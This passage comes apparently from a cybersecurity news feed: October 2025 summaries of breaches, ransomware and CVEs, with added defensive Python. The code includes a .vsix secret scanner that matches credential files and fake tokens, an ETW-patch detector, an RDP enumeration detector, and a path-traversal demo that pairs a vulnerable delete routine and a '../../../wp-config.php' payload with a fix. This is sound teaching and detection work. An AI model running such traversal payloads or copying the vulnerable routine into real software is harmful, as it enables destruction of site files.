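    r"(?:^|/)(?:\.env|\.npmrc|\.git/config|id_rsa|id_ed25519)$")


def redact(secret: str) -> str:
    """Keep only enough of a hit to triage it; never log the full token."""
    return secret if len(secret) <= 8 else secret[:4] + "..." + secret[-4:]


def scan_vsix(data: bytes, max_file_bytes: int = 5_000_000) -> list[dict]:
    """Return one finding per suspicious file name or secret-shaped string."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            name = info.filename
            if SUSPICIOUS_NAMES.search(name):
                findings.append({"file": name, "kind": "suspicious_file", "match": name})
            if info.file_size > max_file_bytes:
                continue  # skip huge blobs (assets) rather than regex them
            text = zf.read(name).decode("utf-8", errors="replace")
            for kind, pattern in SECRET_PATTERNS.items():
                for m in pattern.finditer(text):
                    findings.append({"file": name, "kind": kind,
                                     "match": redact(m.group(0))})
    return findings


def build_sample_vsix(leak_secrets: bool = True) -> bytes:
    """Constructed .vsix: a minimal extension, optionally with the kind of
    stray files the research describes. The 'secrets' are fake placeholders."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("extension/package.json",
                    '{"name": "demo-ext", "publisher": "demo"}')
        zf.writestr("extension/out/extension.js",
                    "exports.activate = function () {};\n")
        if leak_secrets:
            zf.writestr("extension/.env",
                        "GITHUB_TOKEN=ghp_" + "A" * 36 + "\n"
                        "AWS_ACCESS_KEY_ID=AKIAABCDEFGHIJKLMNOP\n")
            zf.writestr("extension/.npmrc",
                        "//registry.npmjs.org/:_authToken=npm_" + "b" * 36 + "\n")
    return buf.getvalue()


if __name__ == "__main__":
    for f in scan_vsix(build_sample_vsix()):
        print(f"{f['kind']:<20} {f['file']:<28} {f['match']}")
```

Run it against a real package by passing the bytes of a downloaded .vsix to scan_vsix(); the same check belongs in the publisher's CI before `vsce publish`, because a token that reaches the marketplace has already leaked.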

Oct 18, 2025 · 4 min read

UK's NCSC Warns of 'Alarming' Rise in Cyberattacks, Doubling in Past Year

The UK's National Cyber Security Centre (NCSC) revealed in its 2025 annual review that it managed 204 "nationally significant" cyberattacks over the past year, more than double the 89 incidents from the previous year. The agency attributed the alarming surge to increasing threats from state-sponsored actors, particularly Russia and China, as well as the proliferation of sophisticated ransomware gangs. The NCSC has urged UK businesses to treat cybersecurity as a matter of survival and to elevate cyber resilience to a board-level responsibility to combat the growing threat.

Oct 18, 2025 · 4 min read

Ransomware Attacks Surge 36% in Q3 2025, Data Stolen in 96% of Cases

A new report from cybersecurity firm BlackFog reveals that publicly disclosed ransomware attacks surged by 36% year-over-year in the third quarter of 2025, setting a new record. The analysis highlights the near-universal adoption of double-extortion tactics, with data exfiltration occurring in 96% of all incidents. The Qilin ransomware group was identified as the most active publicly attributed gang. Healthcare remained the most targeted public sector, while manufacturing was the hardest-hit sector in non-disclosed attacks, underscoring the pervasive and growing threat of ransomware across all industries.

Oct 18, 2025 · 4 min read

CISA Warns: Critical Adobe AEM Flaw (CVSS 10.0) Actively Exploited

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued an urgent warning for a critical remote code execution (RCE) vulnerability in Adobe Experience Manager (AEM) Forms, tracked as CVE-2025-54253. The flaw, which carries a perfect 10.0 CVSS score, allows for unauthenticated arbitrary code execution and is being actively exploited in the wild. CISA has added it to its Known Exploited Vulnerabilities (KEV) catalog, mandating federal agencies to patch by November 5, 2025. The vulnerability stems from a misconfiguration in JEE versions of AEM that exposes a debug servlet, allowing attackers to achieve full system compromise.

Oct 17, 2025 · 4 min read

UK Fines Capita £14M for "Preventable" 2023 Data Breach

The UK's Information Commissioner's Office (ICO) has levied a £14 million fine against outsourcing giant Capita for significant data protection failures related to a March 2023 data breach that impacted 6.6 million people. The ICO's investigation concluded the breach was 'preventable' and heavily criticized Capita's slow incident response, noting that a compromised device remained active on the network for 58 hours after detection, allowing for further exploitation. The penalty highlights the increasing regulatory focus on the speed and efficacy of breach containment.

Oct 17, 2025 · 4 min read

CISA Issues 13 Advisories for Critical ICS/OT Vulnerabilities

On October 16, 2025, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a significant batch of thirteen advisories for vulnerabilities affecting Industrial Control Systems (ICS). These alerts impact widely used Operational Technology (OT) products from major vendors including Rockwell Automation, Siemens, Hitachi Energy, Schneider Electric, and Delta Electronics. The flaws pose a direct risk to critical infrastructure sectors such as manufacturing and energy. CISA is urging all asset owners and operators to review the advisories and implement the recommended mitigations immediately.

Oct 17, 2025 · 4 min read

California Enacts Stricter Data Breach Law with 30-Day Notification Deadline

California has enacted Senate Bill 446, a new law that significantly shortens the data breach notification timeline for businesses. Organizations must now inform affected California residents of a data breach involving unencrypted personal information within 30 calendar days of its discovery. This amendment to the state's already stringent privacy laws places increased pressure on companies to have highly efficient incident detection and response processes in place to meet the accelerated deadline.

Oct 17, 2025 · 4 min read

Ransomware Attacks Surge by 46% as Threat Actors Target Construction and Manufacturing

Despite a slight decrease in overall weekly cyber attacks, ransomware activity has surged by 46%, according to a new report from Check Point Research. This indicates a strategic shift by threat actors towards more focused and impactful ransomware campaigns. The construction, business services, and industrial manufacturing sectors have been the most victimized, bearing the brunt of this new wave. The report identifies the Qilin ransomware-as-a-service (RaaS) group as one of the most prominent actors, responsible for 14.1% of publicly disclosed victims. The findings highlight an urgent need for organizations, especially in the industrial and business services sectors, to bolster their defenses against an increasingly targeted ransomware threat.

Oct 17, 2025 · 4 min read

Akira Ransomware Gang Actively Exploiting SonicWall VPNs for Network Breaches

The Akira ransomware group is actively exploiting vulnerabilities in SonicWall SSL VPN devices to gain initial access to corporate networks. By targeting these widely used, internet-facing appliances, the threat actors can establish a foothold, move laterally, exfiltrate sensitive data, and ultimately deploy the Akira ransomware payload. This campaign underscores the critical importance of promptly patching edge devices and enforcing multi-factor authentication for all remote access solutions to defend against sophisticated ransomware attacks.

Oct 16, 2025 · 6 min read

CISA Orders Urgent Patching After Chinese Hackers Steal F5 Source Code

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued Emergency Directive 26-01, ordering federal agencies to take immediate action after F5 disclosed a severe breach by a sophisticated nation-state actor, reportedly linked to China. The attackers maintained access for at least a year, exfiltrating proprietary source code for F5 BIG-IP products and details of unpatched vulnerabilities. This breach poses an imminent supply chain risk, as the stolen data could allow adversaries to craft powerful zero-day exploits against F5 customers worldwide, including government and critical infrastructure.

Oct 16, 2025 · 6 min read

Microsoft Thwarts Ransomware Campaign by Revoking 200+ Malicious Code-Signing Certificates

Microsoft has taken decisive action to disrupt a ransomware campaign by the threat group Vanilla Tempest (also known as Vice Society), which has been targeting education and healthcare. The group was using over 200 fraudulently obtained code-signing certificates to sign counterfeit Microsoft Teams installers. These fake installers delivered the Oyster backdoor, which in turn deployed the Rhysida ransomware. By revoking the certificates from providers like DigiCert, SSL.com, and its own Trusted Signing service, Microsoft has significantly hindered the malware's ability to evade detection.

Oct 16, 2025 · 5 min read

Full Industrial Control: Two CVSS 10.0 Flaws Found in Red Lion ICS RTUs

Security researchers have discovered and disclosed two critical vulnerabilities, both rated CVSS 10.0, in Red Lion Sixnet series industrial remote terminal units (RTUs). The flaws, CVE-2023-42770 (authentication bypass) and CVE-2023-40151 (remote code execution), can be chained together. An unauthenticated attacker can exploit them over the network to execute arbitrary commands with root privileges on affected devices, which are commonly used in critical infrastructure sectors like energy and water treatment, posing a risk of severe physical disruption.

Oct 16, 2025 · 5 min read

New 'LinkPro' Linux Rootkit Uses eBPF and 'Magic Packets' for Ultimate Stealth

Security researchers have uncovered a sophisticated new GNU/Linux rootkit named 'LinkPro' after investigating a compromised AWS environment. The malware hides its processes and files from security tools by loading eBPF programs into the kernel, and it employs a novel activation mechanism, lying dormant until it receives a specially crafted 'magic packet' over the network, which means there is no open port or beacon to find while it waits. The initial intrusion vector was a vulnerable Jenkins server, from which the attackers deployed the rootkit via a malicious Docker image.

Oct 16, 2025 · 6 min read

Qilin Ransomware Group Adds New Victims to Leak Site

The Qilin ransomware-as-a-service (RaaS) operation continues its campaign of double extortion, recently adding new victims to its data leak site. Among the latest targets are U.S.-based electrical equipment manufacturer Beta Dyne and Middlesex Appraisal Associates. According to research from Resecurity, the group's operational resilience is bolstered by its use of a global network of bulletproof hosting providers, making its infrastructure difficult to disrupt. The group's continued activity poses a persistent threat to organizations across various sectors, leveraging data encryption and the threat of public data release to pressure victims into paying ransoms.

Oct 16, 2025 · 4 min read

Vietnam Airlines Breach: 7.3M Customer Records Exposed in Salesforce Supply Chain Attack

Vietnam Airlines has suffered a massive data breach exposing the records of 7.3 million unique customers. The attack, revealed on October 11, 2025, is attributed to the 'Scattered LAPSUS$ Hunters' hacking group, the same collective behind the recent Qantas breach. The compromise occurred in June 2025 when attackers gained access to the airline's Salesforce-based CRM platform. The stolen data, which includes 7.3 million unique email addresses and other personal details, was released in October. The incident highlights the growing threat of supply chain attacks targeting major software vendors like Salesforce to compromise their extensive client bases. The airline's delayed response has drawn criticism for a lack of transparency.

Oct 15, 2025 · 5 min read

Canadian Tire Reveals E-Commerce Data Breach Affecting Multiple Retail Brands

Canadian Tire Corp., a major Canadian retail conglomerate, has reported a data breach affecting its e-commerce customers. Discovered on October 2, 2025, the incident involved unauthorized access to a single database serving multiple brands, including Canadian Tire, SportChek, Mark's/L'Équipeur, and Party City. The exposed data includes customer names, addresses, email addresses, and years of birth. The company stated that financial data and its Triangle Rewards loyalty program were not impacted. For a subset of fewer than 150,000 customers whose full birth dates were exposed, Canadian Tire is offering complimentary credit monitoring services.

Oct 15, 2025 · 4 min read

LockBit Ransomware Returns from Hiatus with Upgraded 'Version 5.0'

After a two-month hiatus following law-enforcement disruption, the prolific LockBit ransomware group has returned, announcing the release of LockBit 5.0. This new version of the ransomware-as-a-service (RaaS) malware incorporates significant technical upgrades designed to evade detection and analysis. According to researchers, a key new feature is the in-memory patching of Event Tracing for Windows (ETW) functions, so that the process never emits the telemetry that EDR and logging tools consume; any detection that depends on ETW-sourced events is blind to that process from then on. The upgraded malware is built for cross-platform attacks, targeting Windows, Linux, and VMware ESXi environments, signaling LockBit's intent to reclaim its dominant position in the cybercrime ecosystem.
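A defender can catch this class of tampering from inside a process by reading the first bytes of the ETW export and checking whether they have been replaced by a "return immediately" stub. The Python below is an added example, not LockBit code and not any vendor's detection. The stub table is an assumption: it lists the common patches, but a patcher can use any equivalent instruction sequence. The live read uses ctypes against ntdll and is therefore Windows-only; on other platforms the script runs the constructed samples instead, and the "untouched" prologue bytes are likewise constructed, not copied from a particular Windows build.

```python
"""Check whether a process's ETW logging entry points have been patched.
Added example, not LockBit code or a vendor's detection. The stub table
lists common "return immediately" patches; it is an assumption that a
given sample uses one of these rather than some equivalent sequence.
The live read is Windows-only; elsewhere the constructed samples run."""
import sys

# Byte sequences that turn an exported function into a no-op. A patcher
# that wants EtwEventWrite to "succeed" without logging typically writes
# one of these over the prologue. (Assumption: not exhaustive.)
KNOWN_STUBS = (
    (b"\xc3", "ret"),
    (b"\x33\xc0\xc3", "xor eax,eax; ret"),
    (b"\x31\xc0\xc3", "xor eax,eax; ret"),
    (b"\x48\x33\xc0\xc3", "xor rax,rax; ret"),
    (b"\x48\x31\xc0\xc3", "xor rax,rax; ret"),
    (b"\xb8\x00\x00\x00\x00\xc3", "mov eax,0; ret"),
)

# ntdll exports on the ETW write path worth checking. EtwEventWrite is the
# one named on the page; the others are the neighbours a patcher also hits.
ETW_EXPORTS = ("EtwEventWrite", "EtwEventWriteEx", "EtwEventWriteFull", "NtTraceEvent")


def classify_prologue(prologue: bytes) -> str:
    """Classify the first bytes of a function as clean, patched, or hooked."""
    if not prologue:
        return "unreadable"
    for stub, desc in KNOWN_STUBS:
        if prologue.startswith(stub):
            return "patched: " + desc
    # An unconditional jump at entry is a hook. EDRs do this legitimately,
    # so report it separately instead of calling it malicious.
    if prologue[:1] == b"\xe9" or prologue[:2] == b"\xff\x25":
        return "hooked: jmp at entry"
    return "clean"


def read_live_prologues(length: int = 8) -> dict:
    """Read the first bytes of each ETW export in this process (Windows only)."""
    if sys.platform != "win32":
        raise RuntimeError("live prologue read is only meaningful on Windows")
    import ctypes
    ntdll = ctypes.WinDLL("ntdll")
    out = {}
    for name in ETW_EXPORTS:
        try:
            func = getattr(ntdll, name)
        except AttributeError:
            continue  # export absent on this Windows build
        addr = ctypes.cast(func, ctypes.c_void_p).value
        out[name] = ctypes.string_at(addr, length)
    return out


# Constructed samples: an ordinary-looking prologue (mov r11,rsp; sub rsp,..),
# a LockBit-style "xor eax,eax; ret" patch, and an EDR-style trampoline.
SAMPLES = {
    "untouched": b"\x4c\x8b\xdc\x48\x83\xec\x58",
    "patched":   b"\x33\xc0\xc3\x90\x90\x90\x90\x90",
    "hooked":    b"\xe9\x10\x20\x30\x40\x90\x90\x90",
}


def audit(prologues: dict) -> dict:
    """Map each function name to its verdict."""
    return {name: classify_prologue(p) for name, p in prologues.items()}


if __name__ == "__main__":
    source = read_live_prologues() if sys.platform == "win32" else SAMPLES
    for name, verdict in audit(source).items():
        print(f"{name:<18} {source[name].hex():<16} {verdict}")
```

The in-process check only sees the current process, which is the point: malware patches its own copy of ntdll, so the comparison has to happen inside the suspect process (or from a kernel or EDR vantage point that can read its memory), not by inspecting ntdll.dll on disk.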

Oct 15, 2025 · 5 min read

Israeli Defense R&D Firm 'MAYA' Targeted in Pro-Resistance Hacktivist Attack

A hacktivist group calling itself the 'Cyber Support Front' has claimed responsibility for a cyberattack against MAYA, an Israeli research and development firm with close ties to the country's Ministry of Defense and major defense contractors like Elbit Systems and Rafael. In a public statement on October 14, the group alleged it had disrupted MAYA's systems and exfiltrated sensitive data, including designs for current and future military equipment. The claims have not been officially confirmed by Israeli authorities, but the incident highlights the ongoing threat of politically motivated cyberattacks against the defense industrial base.

Oct 15, 2025 · 4 min read

Fortinet Discloses High-Severity Authenticated RCE Flaw in FortiOS CLI

Fortinet has disclosed a high-severity vulnerability in the command line interface (CLI) of its FortiOS operating system. The flaw could allow an authenticated attacker to execute arbitrary commands on the underlying system. While a CVE identifier has not yet been assigned and specific affected versions are not detailed, the vulnerability poses a significant risk. An attacker with valid CLI credentials could leverage this flaw to gain full control of a Fortinet appliance, bypass security controls, and use the device as a pivot point for further network intrusion. Administrators are urged to monitor for an official security advisory and apply patches as soon as they are available.

Oct 15, 2025 · 4 min read

Chinese APT 'Jewelbug' Breaches Russian IT Firm in Supply Chain Threat

In a rare instance of Chinese cyber-espionage targeting a Russian entity, the APT group known as Jewelbug compromised a Russian IT service provider for five months in early 2025. According to Symantec, the attackers gained access to the firm's code repositories and software build systems, creating a significant risk of a software supply chain attack. The group used the powerful ShadowPad backdoor and exfiltrated data to Yandex Cloud to evade detection. This campaign highlights the expanding target scope of Chinese APTs and their focus on compromising trusted providers to enable downstream attacks.

Oct 14, 2025 · 5 min read

Fashion Retailer MANGO Discloses Data Breach from Third-Party Vendor

Global fashion retailer MANGO has notified customers of a data breach that originated from a compromise at an external marketing service provider. The incident, disclosed on October 14, 2025, resulted in the unauthorized access of customer contact information, including names, country, postal codes, email addresses, and phone numbers. MANGO has confirmed that its internal systems were not affected and that no sensitive financial data or account credentials were exposed. The company has reported the breach to the Spanish Data Protection Agency (AEPD) and is advising customers to be wary of potential phishing attacks.

Oct 14, 2025 · 4 min read

Adobe Patches 35+ Flaws, Including Critical RCE Bug in Connect

As part of its October 2025 security updates, Adobe has released patches for more than 35 vulnerabilities across a dozen products. The most severe of these is a critical cross-site scripting (XSS) vulnerability in Adobe Connect, tracked as CVE-2025-49553, which could lead to arbitrary code execution. The flaw holds a CVSS score of 9.3. Other high-severity flaws were addressed in Adobe Commerce and Magento Open Source. Adobe has assigned a lower priority rating to most updates but recommends that users of Commerce and Magento patch promptly due to a historically elevated risk of attack.

Oct 14, 2025 · 4 min read

Massive Botnet of 100k+ IPs Targets U.S. RDP Services

Security researchers at GreyNoise have identified a massive, coordinated botnet campaign targeting Remote Desktop Protocol (RDP) services across the United States. The operation, which began on October 8, 2025, involves over 100,000 unique IP addresses from more than 100 countries. The botnet is using enumeration and timing attacks against RD Web Access and RDP web clients to identify valid user credentials. The widespread and centrally controlled nature of the campaign poses a significant threat to any organization exposing RDP to the internet, as a successful compromise can quickly lead to ransomware deployment or data theft.
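The defining feature of this campaign is the distribution of attempts: 100,000 sources each making a handful of requests never trips a per-IP lockout, so the detection has to aggregate by time window rather than by source. The Python below is an added example, not GreyNoise's logic. It assumes the RD Web site's IIS logs carry the W3C fields date, time, c-ip, cs-method, cs-uri-stem, cs-username, sc-status and time-taken (all selectable in IIS logging settings); the log lines and thresholds are constructed for the demo and the thresholds must be tuned to a site's real login volume.

```python
"""Flag RD Web Access login enumeration in IIS W3C logs. Added example, not
GreyNoise's detection logic. Assumes the IIS site logs the fields
'date time c-ip cs-method cs-uri-stem cs-username sc-status time-taken';
the sample lines and thresholds are constructed."""
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta

LOG_RE = re.compile(
    r"^(?P<date>\d{4}-\d{2}-\d{2}) (?P<time>\d{2}:\d{2}:\d{2}) (?P<ip>\S+) "
    r"(?P<method>\S+) (?P<uri>\S+) (?P<user>\S+) (?P<status>\d{3}) (?P<ms>\d+)$")
RDWEB_LOGIN = re.compile(r"^/RDWeb/Pages/[^/]+/login\.aspx$", re.IGNORECASE)
EPOCH = datetime(1970, 1, 1)


def parse_rdweb_posts(lines):
    """Keep only POSTs to the RDWeb login form; everything else is noise here."""
    events = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m or m["method"].upper() != "POST" or not RDWEB_LOGIN.match(m["uri"]):
            continue
        events.append({
            "ts": datetime.fromisoformat(m["date"] + "T" + m["time"]),
            "ip": m["ip"], "user": m["user"],
            "status": int(m["status"]), "ms": int(m["ms"]),
        })
    return events


def detect(events, window=timedelta(minutes=10), min_sources=20,
           max_per_source=3, min_single_source=30):
    """Two signatures per time window:
    - distributed: many distinct sources, each making only a few attempts
      (the botnet pattern that per-IP lockouts never trip);
    - single-source: one IP hammering the form (classic brute force).
    Thresholds are assumptions; tune them to the site's real login volume."""
    buckets = defaultdict(list)
    for e in events:
        buckets[(e["ts"] - EPOCH) // window].append(e)   # integer window index
    alerts = []
    for idx in sorted(buckets):
        evs = buckets[idx]
        per_ip = Counter(e["ip"] for e in evs)
        start = (EPOCH + idx * window).isoformat()
        if len(per_ip) >= min_sources and max(per_ip.values()) <= max_per_source:
            alerts.append({"type": "distributed_rdweb_enumeration", "window": start,
                           "sources": len(per_ip), "attempts": len(evs),
                           "usernames": len({e["user"] for e in evs})})
        for ip, n in per_ip.items():
            if n >= min_single_source:
                alerts.append({"type": "single_source_rdweb_bruteforce",
                               "window": start, "ip": ip, "attempts": n})
    return alerts


def sample_log_lines():
    """Constructed IIS log: one real employee login, then a low-and-slow
    spray from 25 sources that each try two usernames in the same window."""
    lines = ["#Fields: date time c-ip cs-method cs-uri-stem cs-username sc-status time-taken",
             "2025-10-07 09:12:01 10.0.5.23 GET /RDWeb/Pages/en-US/login.aspx - 200 45",
             "2025-10-07 09:12:04 10.0.5.23 POST /RDWeb/Pages/en-US/login.aspx corp\\alice 302 118"]
    users = ["administrator", "admin", "svc_backup", "jsmith", "helpdesk"]
    for i in range(25):
        for j in range(2):
            n = i * 2 + j
            lines.append(f"2025-10-08 03:14:{n:02d} 203.0.113.{i + 1} POST "
                         f"/RDWeb/Pages/en-US/login.aspx {users[(i + j) % 5]} 200 {350 + 40 * j}")
    return lines


if __name__ == "__main__":
    for alert in detect(parse_rdweb_posts(sample_log_lines())):
        print(alert)
```

The same bucketing works on RD Gateway or Windows Security events (4625 failures keyed on source address) if the web tier is not logging; what matters is counting distinct sources per window, because that is the dimension a distributed campaign cannot hide.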

Oct 14, 2025 · 5 min read

Qilin Ransomware Hits Japanese Beer Giant Asahi, Steals 27GB of Data

The Russia-based Qilin ransomware group has claimed responsibility for a cyberattack that disrupted operations at Asahi Group Holdings, Japan's largest brewing company. The attack, confirmed by Asahi on October 6, impacted order and shipment systems. On its dark web leak site, the Qilin gang stated it exfiltrated 27 gigabytes of sensitive corporate data, including contracts, financial documents, and employee information. The group has posted samples of the stolen data to pressure Asahi into paying the ransom, highlighting the severe risk ransomware poses to manufacturing and supply chain operations.

Oct 14, 2025 · 4 min read

Living Off the Land: Hackers Abuse Velociraptor DFIR Tool to Deploy Ransomware

A suspected China-based threat group, Storm-2603, is weaponizing the legitimate open-source digital forensics and incident response (DFIR) tool, Velociraptor. According to Cisco Talos, the attackers are using an outdated and vulnerable version of the tool (exploiting CVE-2025-6264) to gain persistence, escalate privileges, and deploy multiple ransomware families, including Warlock, LockBit, and Babuk. The campaign highlights the growing trend of attackers abusing trusted security tools to evade detection while compromising VMware ESXi and Windows environments.

Oct 13, 2025 · 5 min read

Supply Chain Attack Hits Discord: Vendor Breach Exposes 70,000 User IDs

The communication platform Discord has disclosed a significant data breach originating from a third-party customer service vendor, 5CA. The incident, which occurred in early October 2025, resulted in unauthorized access to the sensitive data of approximately 70,000 users who had interacted with Discord's support teams. Exposed information includes photos of government-issued IDs, names, email addresses, IP addresses, and partial billing data. The breach highlights the persistent and growing risk of supply chain attacks, where attackers target less secure partners to access data from larger organizations.

Oct 13, 2025 · 4 min read

Ransomware Groups Pivot to Healthcare Vendors, Attacks Surge 30%

A new report from Comparitech reveals a significant strategic shift in ransomware attacks targeting the healthcare sector. While attacks on direct care providers remained steady, incidents involving healthcare-affiliated businesses and vendors surged by 30% in the first nine months of 2025. Threat actors like Qilin and INC are increasingly targeting less-secure partners such as medical billing services and pharmaceutical manufacturers to disrupt the healthcare supply chain, leading to the breach of over 6 million records from confirmed attacks on these adjacent businesses alone.

Oct 13, 2025 · 4 min read

Russian APT Seashell Blizzard Targets European Critical Infrastructure

A subgroup of Sandworm, the Russian state-sponsored threat actor that Microsoft tracks as Seashell Blizzard, is conducting a new campaign against critical infrastructure in Ukraine and Europe. The attacks use phishing emails with malicious XLL attachments (Excel add-ins, which are native DLLs that run as soon as Excel loads them) to deliver a custom downloader, CheapShot, which in turn deploys a backdoor called ShroudDoor. The campaign targets organizations in the agricultural, defense, transportation, and manufacturing sectors, highlighting ongoing espionage and disruptive efforts by Russian APTs.

Oct 13, 2025 · 4 min read

LastPass Warns of Active Phishing Campaign Impersonating Brand

Password manager LastPass issued an alert on October 13, 2025, about an active phishing campaign targeting its users. The attackers are sending emails from a fraudulent domain with subject lines like "We Have Been Hacked," creating a false sense of urgency to trick users into clicking a malicious link. The link directs victims to a convincing phishing site designed to steal their master password. LastPass has confirmed it was not hacked and is working to take down the malicious infrastructure.

Oct 13, 2025 · 4 min read

New Android Spyware "ClayRat" Spreads via Telegram, Hijacks SMS

A new Android spyware named "ClayRat" is targeting Russian users through fake applications distributed on phishing sites and Telegram. The malware uses sophisticated techniques to bypass Android 13+ security restrictions, install itself as the default SMS handler to intercept 2FA codes, and exfiltrate a wide range of data including call logs and photos. A key feature of ClayRat is its self-propagation mechanism, where it automatically sends malicious links via SMS to all contacts on the victim's device, rapidly expanding the infection.

Oct 13, 2025 · 4 min read

Ivanti Discloses 13 Vulnerabilities in Endpoint Manager, Two High-Severity

Ivanti has released a security advisory for its Endpoint Manager (EPM) software, detailing 13 new vulnerabilities. The batch includes two high-severity flaws—one allowing for local privilege escalation and another for remote code execution with user interaction—and eleven medium-severity bugs, many of which are SQL injection vulnerabilities. While none of the flaws are known to be actively exploited, Ivanti is urging customers to upgrade from the now end-of-life EPM 2022 to the more secure 2024 version and apply forthcoming patches.

Oct 13, 2025 · 4 min read

New York Inflation Refund Program Exploited in Phishing Scams

The New York State Department of Taxation and Finance is warning residents about phishing and smishing (SMS phishing) campaigns that are exploiting a legitimate state inflation relief program. Scammers are sending fraudulent messages claiming that recipients must submit personal and payment information via a malicious link to receive their refund. In reality, the legitimate program sends checks automatically to eligible taxpayers with no action required. The scams use social engineering to create urgency and trick victims into giving up sensitive data.

Oct 13, 2025 · 3 min read

Cl0p Exploits Oracle EBS Zero-Day in Widespread Extortion Campaign, FBI Issues Emergency Warning

A financially motivated threat group, claiming ties to the notorious [Cl0p](https://attack.mitre.org/groups/G0114/) ransomware gang, has been exploiting a critical zero-day vulnerability in [Oracle E-Business Suite](https://www.oracle.com/applications/ebs/) (EBS). The flaw, CVE-2025-61882, is an unauthenticated remote code execution vulnerability with a 9.8 CVSS score. Investigations by Google and Mandiant found that the attackers had been exploiting it since at least August 2025, roughly two months before Oracle released a patch on October 4. The campaign involves exfiltrating large volumes of data and sending extortion emails to executives. The [FBI](https://www.fbi.gov) has issued an emergency warning urging immediate patching, highlighting the severe risk to sectors like healthcare and education, with Harvard University confirmed as one of the victims.

Oct 13, 2025 · 6 min read

Oracle Issues Emergency Patch for High-Severity EBS Flaw Amid Active Clop Attacks

Oracle has released an emergency security patch for a high-severity vulnerability, CVE-2025-61884, in its E-Business Suite (EBS). The flaw, which has a CVSS score of 7.5, allows an unauthenticated, remote attacker to access sensitive data within the Oracle Configurator module. It affects EBS versions 12.2.3 through 12.2.14. This alert is especially critical as it comes while the Clop ransomware group is actively exploiting a separate, critical zero-day (CVE-2025-61882) in EBS for an executive extortion campaign. While there's no confirmed link, the active targeting of EBS by Clop significantly increases the risk that this new vulnerability will be weaponized. Administrators are urged to apply the patch immediately.

Oct 12, 2025 · 4 min read

Discord Denies Massive Breach Claim After Hackers Allege 1.5TB Data Leak

Discord is publicly denying claims that it suffered a major data breach. On October 11, 2025, an unknown group of hackers alleged they had exfiltrated and leaked 1.5 terabytes of user data, including highly sensitive government-issued identification documents. Some reports suggested the breach was linked to Discord's Zendesk customer support portal, an allegation Zendesk also refuted, stating its systems were not vulnerable. Discord maintains that its services were not compromised and that the claims are unverified. The significant discrepancy between the hackers' claims and the company's denial leaves the situation unclear, but the mere allegation of leaked IDs poses a serious concern for users.

Oct 12, 2025 · 5 min read

North Korean Hackers Shatter Records, Stealing $2 Billion in Crypto in 2025

North Korean state-sponsored hacking groups have stolen over $2 billion in cryptocurrency assets in 2025 so far, marking the largest annual total ever recorded for the regime. A report highlighted on October 11, 2025, points to the increasing scale and sophistication of these financially motivated cyber operations. The single largest heist of the year was the February 2025 attack on the Bybit cryptocurrency exchange, which accounted for $1.46 billion of the total losses. These attacks on crypto exchanges and DeFi platforms are a critical source of revenue for North Korea, allowing it to circumvent international sanctions and fund its weapons programs.

Oct 12, 2025 · 5 min read

North Korean IT Worker Fraud Scheme Expands, Targeting 5,000 Companies

A sophisticated North Korean scheme using fraudulent IT worker personas to infiltrate companies has expanded into a massive global operation. According to a report from October 11, 2025, researchers have identified over 130 fake identities used in more than 6,500 job interviews with approximately 5,000 companies over a four-year period. These state-sponsored operatives pose as skilled freelance IT workers to secure remote employment, then use their insider access to conduct espionage, steal intellectual property, and divert funds. The campaign, previously thought to be focused on the U.S., is now confirmed to be global, prompting warnings for businesses to enhance their hiring and verification processes for remote workers.

Oct 12, 2025 · 5 min read

Critical RCE Flaw in WooCommerce Designer Pro Plugin Puts WordPress Sites at Risk

A critical vulnerability, CVE-2025-6439, has been disclosed in the WooCommerce Designer Pro WordPress plugin. The flaw, rated 9.8 out of 10 on the CVSS scale, is a path traversal issue that allows an unauthenticated attacker to delete arbitrary files on the web server. This can lead to complete data loss and website destruction, or to remote code execution (RCE): deleting wp-config.php drops the site back into its installer, letting the attacker re-run setup against a database they control and from there install arbitrary code. The vulnerability affects all versions up to and including 1.9.26 and is also present in the 'Pricom' theme, which bundles the plugin. Users are urged to update immediately.
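The bug class is worth seeing side by side with its fix. The Python below is an added example, written in Python rather than the plugin's PHP, and it is not the plugin's code: it builds a throwaway directory tree that mimics a WordPress install (the wp-config.php in it is a constructed stand-in), runs a traversal payload through a vulnerable delete routine that simply joins the caller's path onto the uploads directory, and then through a hardened one that resolves the path (collapsing '..' and following symlinks) and refuses anything that ends up outside the uploads directory.

```python
"""Arbitrary-file-deletion via path traversal, vulnerable and hardened,
in a throwaway directory tree. Added example in Python, not the plugin's
PHP; the file layout mimics a WordPress install only to make the impact
concrete, and wp-config.php here is a constructed stand-in."""
import os
import tempfile
from pathlib import Path


class PathEscape(ValueError):
    """Raised when a caller-supplied path would leave the allowed directory."""


def unsafe_delete(upload_dir: str, user_path: str) -> str:
    """Vulnerable pattern: joins attacker-controlled input onto a base
    directory and deletes whatever that resolves to."""
    target = os.path.join(upload_dir, user_path)
    os.remove(target)
    return target


def resolve_confined(upload_dir: str, user_path: str) -> Path:
    """Resolve user_path inside upload_dir, refusing anything that escapes
    it via '..', an absolute path, a NUL byte, or a symlink."""
    base = Path(upload_dir).resolve(strict=True)
    if not user_path or "\x00" in user_path or os.path.isabs(user_path):
        raise PathEscape(f"rejected path {user_path!r}")
    target = (base / user_path).resolve()   # collapses '..' and follows symlinks
    if target == base or base not in target.parents:
        raise PathEscape(f"{user_path!r} escapes {base}")
    return target


def safe_delete(upload_dir: str, user_path: str) -> Path:
    """Hardened delete: only regular files strictly below upload_dir."""
    target = resolve_confined(upload_dir, user_path)
    if not target.is_file():
        raise FileNotFoundError(str(target))
    target.unlink()
    return target


def demo() -> dict:
    """Run both versions against the same traversal payload and report."""
    with tempfile.TemporaryDirectory() as root:
        site = Path(root)
        uploads = site / "wp-content" / "uploads" / "designer"
        uploads.mkdir(parents=True)
        (uploads / "design.png").write_bytes(b"\x89PNG constructed")
        config = site / "wp-config.php"
        config.write_text("<?php // constructed stand-in for the real file\n")
        payload = "../../../wp-config.php"
        results = {}

        unsafe_delete(str(uploads), payload)
        results["unsafe_removed_config"] = not config.exists()

        config.write_text("<?php // restored for the second run\n")
        try:
            safe_delete(str(uploads), payload)
            results["safe_blocked"] = False
        except PathEscape:
            results["safe_blocked"] = True
        results["config_survives"] = config.exists()

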